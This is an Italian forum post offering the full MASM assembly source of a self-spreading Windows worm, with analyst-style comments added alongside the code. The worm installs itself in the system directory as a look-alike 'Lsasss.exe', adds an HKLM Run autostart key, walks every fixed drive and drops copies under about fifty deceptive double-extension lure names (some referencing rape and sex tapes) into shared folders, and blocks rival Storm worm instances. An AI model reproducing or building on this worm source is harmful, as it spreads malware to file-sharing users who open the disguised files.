Ola raga era un po' che non postavo le mie simpatiche(lol) creature. Bene oggi vi posto un mio worm scritto completamente in assembly che ha queste features:
-Si copia in C:\windows\system32
-Si autoavvia ad ogni avvio di sistema
-si copia in tutte le cartelle contenenti la parola "shar"(tipo shared o shar)
con 50 nomi diversi
-killa diverse versioni dello storm worm(un altro worm)
-usa le mutex per prevenire più istanze di se stesso
enjoy XD
-Si copia in C:\windows\system32
-Si autoavvia ad ogni avvio di sistema
-si copia in tutte le cartelle contenenti la parola "shar"(tipo shared o shar)
con 50 nomi diversi
-killa diverse versioni dello storm worm(un altro worm)
-usa le mutex per prevenire più istanze di se stesso
Codice:
;
; P2PREVENGE WORM
;
; WRITTEN IN ASSEMBLY BY DELTA
; COMPILARE CON MASM
;
.486
.model flat, stdcall
option casemap:none
include shlwapi.inc
include windows.inc
include kernel32.inc
include user32.inc
include advapi32.inc
include shell32.inc
include gdi32.inc
.list
includelib gdi32.lib
includelib shell32.lib
includelib advapi32.lib
includelib user32.lib
includelib kernel32.lib
includelib shlwapi.lib
; mNextListEntry ML
; List-walking helper used by the procs that iterate a string table.
; In:    edi = pointer into a list of NUL-terminated strings that ends with
;        an extra NUL byte (empty string).
; Out:   edi = first byte after the current string's terminator.
;        Jumps to label ML when that byte is non-zero (another entry
;        follows); falls through when it is zero (end of list).
; Clobb: eax (zeroed), ecx, edi, flags; direction flag cleared.
mNextListEntry MACRO ML
; forward scan
cld
; al = 0, the byte scasb searches for
xor eax, eax
; ecx = 0FFFFFFFFh, i.e. no practical length limit on the scan
or ecx, -1
; stops with edi one past the NUL that ends the current string
repnz scasb
; a second NUL here marks the end of the table
cmp byte ptr[edi], 0
jnz ML
ENDM
; Initialised data. Analysis notes (defender view): the literals below are
; embedded verbatim in the built binary, so they double as static
; string indicators for this sample.
.data
; Author banner; not referenced by any code visible on this page.
szCopyright db 'Komodo worm written in assembly by Un adolescente arrabbiato, 2008/03/23 italy',0
; Not referenced by any code visible on this page.
szMessage db 'Fioroni: ci hai rovinato e ora noi rovineremo te.',0
; Registry value name written by regnow under the Run key below. It imitates
; the name of the legitimate lsass process.
szKeyName db 'Lsass',0
; Not referenced by any code visible on this page (regnow uses the REG_SZ constant).
szREGSZ db 'REG_SZ',0
; Autostart key opened under HKEY_LOCAL_MACHINE by regnow (persistence location).
szTestKey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; File name appended to the system directory by regnow. Note the three 's'
; characters: it is a look-alike of lsass.exe, not the real file name.
szLsass db '\Lsasss.exe',0
; Name of the mutex created by the Mutex proc (host-level indicator).
szMutex db 'Fuck_fiorono',0
; The next three dwords are not referenced by any code visible on this page.
hkey dd ?
lpdwDisp dd ?
dayt dd ?
; Substring searched for (case-insensitively, via StrStrI) in the last
; path component by HDDScanFromPath.
szShar db "shar",0
; Caption and text operands used by the Message proc.
szMessageTitle db 'Fioroni',0
szMessageBody db "L'italia è un bel paese. Peccato che fioroni ha rovinato tutto davanti al mondo intero.",0
db "Ora il sistema scolastico è in crisi. 7 alluni su 10 bocciati. Ma stiamo scherzando?",13,10
db "Fioroni: questo è un assaggio di quello che possiamo fare. Non ci sfidare o faremo",13,10
db "di peggio.",13,10
db "For english people:",13,10
db " Komodo worm ",13,10
db "written in assembly by UNADOLESCENTEARRABBIATO 2008-03-21 23:45 ",0
; Path separator appended after each enumerated entry name in HDDScanFromPath.
szHDDSlash db "\",0
; Not referenced by any code visible on this page.
szHDDSearch db "*.*",0
; Wildcard appended to the current path before FindFirstFile in HDDScanFromPath.
szHDDSearchMask db "*.*",0
; szSharNames: start of the table of lure file names that CopyShare appends
; to a matching folder path; the table continues on the following db lines
; and is closed by an extra NUL. The names imitate software installers,
; media files and "leaked" archives, and many carry a document/media
; extension followed by a space and ".exe".
; Detection note: an executable whose name contains a second, non-executable
; extension before " .exe", or many differently named copies of one binary
; appearing in the same folder, matches this behaviour.
szSharNames db "Autocad 2008 FULL-ENG-ITA-FRA-SPA-DE.exe", 0
db "Adobe Photoshop Full Version.exe", 0
db "Iphone source code.zip .exe",0
db "Visual c++ 6 FULL.exe",0
db "WinRAR-Full.exe",0
db "Windows Vista ultimate full (8 languages).exe",0
db "WINDOWS SOURCE CODE.zip .exe",0
db "jenna jameson screensaver.scr",0
db "Opera 10 FULL.exe",0
db "Internet explorer 8.exe",0
db "Brianna banks and jenna jameson.mpeg .exe",0
db "Norton AntiVirus 2008.exe",0
db "Halo 3 (xbox360).iso .exe",0
db "NETSKY SOURCE CODE.zip .exe",0
db "Kazaa Lite.zip .exe",0
db "Windows crack all versione .zip .exe",0
db "Rape-women rape by a chinese and suck him dick.mpeg .exe",0
db "Britney spears naked.jpeg .exe",0
db "Nero burning 2008 FULL.exe",0
db "Visual Studio.NET 2008 FULL.zip .exe",0
db "Eva longoria sex tape.avi .exe",0
db "Katie Holmes sex tape.avi .exe",0
db "Nasa secret file leaked.rar .exe",0
db "area51 leaked files.zip .exe",0
db "Windows seven alpha leaked.iso .exe",0
db "Windows xp keygen generator(by SILENT).exe",0
db "I.Am.Legend.DVDRip.XviD-AXXO.avi .exe",0
db "googlebot source code leaked(cpp).zip .exe",0
db "msn source code(asp).zip .exe",0
db "yahoo email(3000) leak.mbox .exe",0
db "www.parisexposed.com(all images and video).zip .exe",0
db "OSX LEOPARD FOR I386.iso .exe",0
db "4 women raped by two men.avi .exe",0
db "SkyOS source code.zip .exe",0
db "kazaa source code.zip .exe",0
db "intel email leak.pst .exe",0
db "RIAA email leak.pst .exe",0
db "Cloverfield.2008.DVDRip.AXXO.avi .exe";0
db "Die.Hard.4.2007.DVDRip.AXXO.avi .exe",0
db "secretary raped.avi .exe",0
db "Avril.Lavigne raped(11.12.2007).avi .exe",0
db "Nicole Kidman sex tape.avi .exe",0
db " White house leaked email.doc .exe", 0
db "Bill clinton sex tape image(SEX).zip .exe",0
db "Windows vista source code(by renegade).zip .exe",0
db "Paris hilton new sex tape(with kim kardashian).avi .exe",0
db "Gmail source code(ajax).tar.gz .exe",0
db " Myspace source code(php).zip .exe",0,0
; szStormMutex: table of mutex names walked by KillStorm, closed by an extra
; NUL. The post describes this feature as targeting versions of the Storm
; worm; presumably these are names those variants use as their own
; instance markers -- this page does not show evidence either way.
; Detection note: the names are static strings in the binary and are created
; as named mutexes at run time by KillStorm.
szStormMutex db 'klllekkdkkd',0
db 'A8dK894Lm9#F2i$s0Bq2X',0
db 'uri40333444',0
db 'hlkjlkjlklk34d',0
db 'd3kb5sujs50lq2mr',0,0
; Uninitialised data: two path buffers of MAX_PATH+1 bytes each.
.data?
; Filled by regnow with <system directory> + szLsass; later read by CopyShare
; as the source file of every copy it makes.
szSysDirFileName db MAX_PATH+1 dup(?)
; Filled by regnow with the path of the running module (GetModuleFileName).
szRunFileName db MAX_PATH+1 dup(?)
.code
; KillStorm
; Walks the szStormMutex table and calls CreateMutex once per entry with
; bInitialOwner = TRUE. The returned handles are neither stored nor closed
; in this proc, and no return value is checked.
; In:    none
; Out:   none meaningful (eax is zeroed by the list-walk macro)
; Clobb: eax, ecx, edx, edi, flags (edi is not saved here)
; Behaviour seen from the host: one process creating each of the names
; in szStormMutex as a named mutex.
KillStorm proc
; edi = first name in the table
mov edi, offset szStormMutex
@next:
invoke CreateMutex, NULL, TRUE, edi
; step edi to the next name; loops to @next until the end-of-table NUL
mNextListEntry @next
Ret
KillStorm EndP
; regnow
; Installs a copy of the running executable and registers it for autostart.
; Steps, in order:
;   1. szSysDirFileName = GetSystemDirectory() + '\Lsasss.exe'
;   2. szRunFileName    = path of the current module
;   3. clears attributes on the destination, then CopyFile with
;      bFailIfExists = FALSE (an existing file at that path is overwritten)
;   4. opens/creates HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and
;      sets REG_SZ value 'Lsass' to the destination path
; None of the API return values is checked.
; In:    none
; Out:   eax = result of RegCloseKey
; Behaviour seen from the host: a file named Lsasss.exe (three 's') in the
; system directory, and a Run value named 'Lsass' pointing at it. Writing
; under HKEY_LOCAL_MACHINE and into the system directory normally requires
; administrative rights.
regnow proc
; registry key handle returned by RegCreateKey
LOCAL hkHandle: DWORD
invoke GetSystemDirectory, offset szSysDirFileName, MAX_PATH
invoke lstrcat, offset szSysDirFileName, offset szLsass
; NULL module handle = the executable of the current process
invoke GetModuleFileName, NULL, offset szRunFileName, MAX_PATH
invoke SetFileAttributes, offset szSysDirFileName, FILE_ATTRIBUTE_NORMAL
invoke CopyFile, offset szRunFileName, offset szSysDirFileName, FALSE
invoke RegCreateKey, HKEY_LOCAL_MACHINE, offset szTestKey, addr hkHandle
; eax = length of the destination path, passed as cbData below
invoke lstrlen, offset szSysDirFileName
invoke RegSetValueEx, hkHandle, offset szKeyName, 0, REG_SZ, offset szSysDirFileName, eax
invoke RegCloseKey, hkHandle
Ret
regnow EndP
; Mutex
; Creates the named mutex whose name is stored at szMutex, with
; bInitialOwner = FALSE.
; In:    none
; Out:   eax = value returned by CreateMutex
; Clobb: edi (not saved here), plus the registers the API call may change
; Behaviour seen from the host: the presence of this named mutex on a
; running system is an indicator for this sample.
Mutex proc
mov edi, offset szMutex
invoke CreateMutex, NULL, FALSE, edi
Ret
Mutex EndP
; CopyShare lpPath
; For every name in the szSharNames table, builds lpPath + name in a scratch
; buffer and copies the file at szSysDirFileName to that location.
; CopyFile is called with bFailIfExists = TRUE, so an existing file with the
; same name is left in place. Return values are not checked.
; In:    lpPath = pointer to a folder path (HDDScanFromPath passes it with a
;        trailing backslash already appended)
; Out:   eax = result of GlobalFree
; edi is saved and restored by the 'uses' clause.
; Behaviour seen from the host: a burst of file-copy operations from one
; source binary into a single folder, each with a different lure name.
CopyShare proc uses edi lpPath: DWORD
; pointer to the 65000-byte scratch buffer
LOCAL adv_path: DWORD
invoke GlobalAlloc, GMEM_FIXED, 65000
mov adv_path, eax
; edi = first lure name
mov edi, offset szSharNames
@next:
; second argument of the lstrcat call below (the current name)
push edi
invoke lstrcpy, adv_path, lpPath
; first argument; together with the earlier push this is lstrcat(adv_path, edi)
push adv_path
call lstrcat
invoke CopyFile, offset szSysDirFileName, adv_path, TRUE
; advance edi to the next name; loops until the end-of-table NUL
mNextListEntry @next
invoke GlobalFree, adv_path
Ret
CopyShare EndP
; HDDScanFromPath lpPath, szBasePath
; Recursive file-system walk. lpPath is a writable path buffer that is
; extended and truncated in place; szBasePath is only passed on to the
; recursive call.
; Per enumerated entry (other than the '.'/'..' names):
;   - the entry name is appended to the current path
;   - the last path component is searched case-insensitively for szShar
;   - a backslash is appended
;   - on a match, CopyShare is called with the resulting path
;   - the proc calls itself on the resulting path
; A 2 ms Sleep is issued between entries.
; In:    lpPath = path buffer ending in a backslash
; Out:   eax = result of LocalFree
; edi (length of the path on entry) is saved and restored by the 'uses'
; clause, which also keeps it intact across the recursive call.
; Behaviour seen from the host: a full recursive directory enumeration,
; with file drops limited to folders whose name contains "shar".
HDDScanFromPath proc uses edi lpPath, szBasePath: DWORD
; search handle from FindFirstFile
LOCAL hFind: DWORD
; pointer to a heap-allocated WIN32_FIND_DATA
LOCAL FindFileData: DWORD
invoke LocalAlloc, GPTR, sizeof WIN32_FIND_DATA
mov FindFileData, eax
invoke lstrlen, lpPath
; edi = length of the path before anything is appended
mov edi, eax
invoke lstrcat, lpPath, offset szHDDSearchMask
invoke FindFirstFile, lpPath, FindFileData
mov hFind, eax
; INVALID_HANDLE_VALUE (-1) becomes 0 after the increment
inc eax
jz @end
@find_loop:
; cut the buffer back to the path it held on entry
mov eax, lpPath
mov byte ptr[eax + edi], 0
mov edx, FindFileData
lea edx, [edx].WIN32_FIND_DATA.cFileName
; two-byte compare: '.' followed by NUL, i.e. the name "."
cmp word ptr[edx], '.'
jz @skip
; two-byte compare: name starts with ".."
cmp word ptr[edx], '..'
jz @skip
invoke lstrcat, lpPath, edx
mov edx, FindFileData
lea edx, [edx].WIN32_FIND_DATA.dwFileAttributes
test dword ptr[edx], FILE_ATTRIBUTE_DIRECTORY
; eax = pointer to the last backslash in the path, or 0
invoke StrRChr, lpPath, NULL, '\'
.IF eax
; step past the backslash to the last component
inc eax
; eax = non-zero when the component contains "shar" (any case)
invoke StrStrI, eax, offset szShar
.ENDIF
; keep the match result across the lstrcat call
push eax
invoke lstrcat, lpPath, offset szHDDSlash
pop eax
.IF eax
invoke CopyShare, lpPath
.ENDIF
invoke HDDScanFromPath, lpPath, szBasePath
jmp @skip
@skip:
invoke Sleep, 2
invoke FindNextFile, hFind, FindFileData
test eax, eax
jnz @find_loop
invoke FindClose, hFind
@end:
invoke LocalFree, FindFileData
ret
HDDScanFromPath endp
; HDDScanDrive szDrive
; Copies the drive root string into a freshly allocated 65536-byte
; zero-initialised buffer (GPTR) and starts the recursive walk on it.
; In:    szDrive = pointer to a drive root string (HDDScanDrives passes
;        entries returned by GetLogicalDriveStrings)
; Out:   eax = result of GlobalFree
HDDScanDrive proc szDrive: DWORD
; working path buffer handed to HDDScanFromPath
LOCAL szLongPath: DWORD
invoke GlobalAlloc, GPTR, 65536
mov szLongPath, eax
invoke lstrcpy, eax, szDrive
; walk only when lstrcpy returned non-zero
.IF eax
invoke HDDScanFromPath, szLongPath, szLongPath
.ENDIF
invoke GlobalFree, szLongPath
ret
HDDScanDrive endp
; HDDScanDrives
; Retrieves the list of logical drive strings and calls HDDScanDrive for
; every entry that GetDriveType reports as DRIVE_FIXED; other drive types
; are stepped over.
; When TESTVERSION is defined at assembly time, the drive loop is replaced
; by a single scan of szHDDBasePath -- a symbol that is not defined
; anywhere on this page.
; In:    none
; Out:   eax = result of GlobalFree
; esi is saved and restored by the 'uses' clause.
HDDScanDrives proc uses esi
; buffer that receives the NUL-separated drive strings
LOCAL DrvBuf: DWORD
invoke GlobalAlloc, GPTR, 8192
mov DrvBuf, eax
invoke GetLogicalDriveStrings, 8191, eax
; esi = cursor over the drive string list
mov esi, DrvBuf
IFDEF TESTVERSION
invoke HDDScanDrive, offset szHDDBasePath
ELSE
@get_next_drv:
; an empty string marks the end of the list
.IF byte ptr[esi]
invoke GetDriveType, esi
.IF eax == DRIVE_FIXED
invoke HDDScanDrive, esi
.ENDIF
; advance past the current string and its terminator
invoke lstrlen, esi
add esi, eax
inc esi
jmp @get_next_drv
.ENDIF
ENDIF
invoke GlobalFree, DrvBuf
ret
HDDScanDrives endp
; Message
; Waits 216000 ms (216 seconds) and then calls MessageBox with
; szMessageBody and szMessageTitle as the text and caption operands and
; the MB_ICONWARNING style.
; In:    none
; Out:   eax = result of MessageBox
Message proc
invoke Sleep, 216000
invoke MessageBox, NULL, szMessageBody, szMessageTitle,MB_ICONWARNING
Ret
Message EndP
; Program entry point. Call order as written:
;   regnow        - self-copy into the system directory + Run-key autostart
;   Mutex         - create the sample's own named mutex
;   HDDScanDrives - walk every fixed drive and drop lure copies into
;                   folders whose name contains "shar"
;   KillStorm     - create the named mutexes listed in szStormMutex
;   Message       - delayed message box
; Analysis summary (indicators taken from this listing): Lsasss.exe in the
; system directory, Run value 'Lsass' under HKLM, the mutex name at szMutex,
; and the lure file names in szSharNames.
start:
invoke regnow
invoke Mutex
invoke HDDScanDrives
invoke KillStorm
invoke Message
ret
end start
enjoy XD